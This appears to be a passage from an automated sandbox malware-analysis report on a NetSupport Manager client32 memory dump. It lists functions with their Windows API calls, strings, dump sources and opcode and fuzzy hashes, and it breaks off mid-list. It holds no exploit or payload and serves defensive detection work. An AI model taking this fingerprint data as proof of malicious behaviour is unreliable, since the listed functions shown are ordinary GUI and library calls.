                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                                              • String ID: NSMClassList
                                                                                                                              • API String ID: 2883182437-2474587545
                                                                                                                              • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                              • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                                              • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                              • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11146190 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 111461A9
                                                                                                                              • LoadBitmapA.USER32 ref: 111461BF
                                                                                                                              • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 111461FB
                                                                                                                              Strings
                                                                                                                              • ..\ctl32\util.cpp, xrefs: 111461D9
                                                                                                                              • hGrip || !"Unable to load sizing grip bitmap", xrefs: 111461DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                                                                              • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                                                                              • API String ID: 1044520585-3315463184
                                                                                                                              • Opcode ID: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                                                                              • Instruction ID: 8e565c128ad7df1c8f5e5c04fb88379ac646e9871c4513a0e4d424585abd715b
                                                                                                                              • Opcode Fuzzy Hash: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                                                                              • Instruction Fuzzy Hash: 0DF0BB79A4032577E61456F19D05FEBBA5C9B44F5DF004430FE19A7A82DE78D900C3E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11004210 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowsleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,0000060C,00000002,00000000), ref: 1100422E
                                                                                                                              • Sleep.KERNEL32(00000064), ref: 11004236
                                                                                                                              • SendMessageA.USER32(?,0000060C,00000003,00000000), ref: 11004249
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 1100425A
                                                                                                                              • m_pToolbar, xrefs: 1100425F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Sleep
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                                                                              • API String ID: 2158920685-281161189
                                                                                                                              • Opcode ID: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                                                                              • Instruction ID: e130d243a18c05c63e38ab9a554661a07bf0098fc6b996864d1fadb4c15248a9
                                                                                                                              • Opcode Fuzzy Hash: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                                                                              • Instruction Fuzzy Hash: B4F0A435B80710AFE228EBA0DC45F47B3E6BBC8704F014214F6119B691D770A901CB44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11146140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                              • LoadLibraryA.KERNEL32(gdi32.dll,?,775F17C0,?,11003D52,00000000,00000008), ref: 11146155
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11146167
                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,11003D52,00000000,00000008), ref: 1114617E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                                                                              • String ID: SetLayout$gdi32.dll
                                                                                                                              • API String ID: 796689547-836973393
                                                                                                                              • Opcode ID: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                                                                              • Instruction ID: d41aa01a6e476ec3efb0e30ba4a4f3b24d6e29c0e630937b51d8ced853034778
                                                                                                                              • Opcode Fuzzy Hash: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                                                                              • Instruction Fuzzy Hash: B9E0E536300129A7A7041BA6AD449AEBB6CDFC4D6E7110032FD28C3E00DF30D80286B1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                                              • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                              • API String ID: 2446111109-1196874063
                                                                                                                              • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                              • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                                              • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                              • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindWindowA.USER32 ref: 11017428
                                                                                                                              • GetWindowLongA.USER32 ref: 11017437
                                                                                                                              • PostMessageA.USER32 ref: 11017458
                                                                                                                              • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageWindow$FindLongPostSend
                                                                                                                              • String ID: IPTip_Main_Window
                                                                                                                              • API String ID: 3445528842-293399287
                                                                                                                              • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                              • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                                              • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                              • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                                                              • %02x, xrefs: 11081610
                                                                                                                              • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf
                                                                                                                              • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                                              • API String ID: 2111968516-476189988
                                                                                                                              • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                                              • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                                                              • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                                              • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100A250 Relevance: 7.5, APIs: 5, Instructions: 47synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                              • DeviceIoControl.KERNEL32 ref: 1100A298
                                                                                                                              • GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseControlCreateDeviceErrorEventHandleLastObjectSingleWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2062450601-0
                                                                                                                              • Opcode ID: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                                                                              • Instruction ID: bc93eed9d268af17b12dc0c75b84aef517d95988fbcc1729b49ee65d4685203d
                                                                                                                              • Opcode Fuzzy Hash: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                                                                              • Instruction Fuzzy Hash: F601F731A40629B7F7159AA8CC45F9DB768AB44775F204320F934A76C0C770A94187D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 11171312
                                                                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                                              • __getptd.LIBCMT ref: 11171329
                                                                                                                              • __amsg_exit.LIBCMT ref: 11171337
                                                                                                                              • __lock.LIBCMT ref: 11171347
                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 938513278-0
                                                                                                                              • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                                              • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                                                              • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                                              • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11012090 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
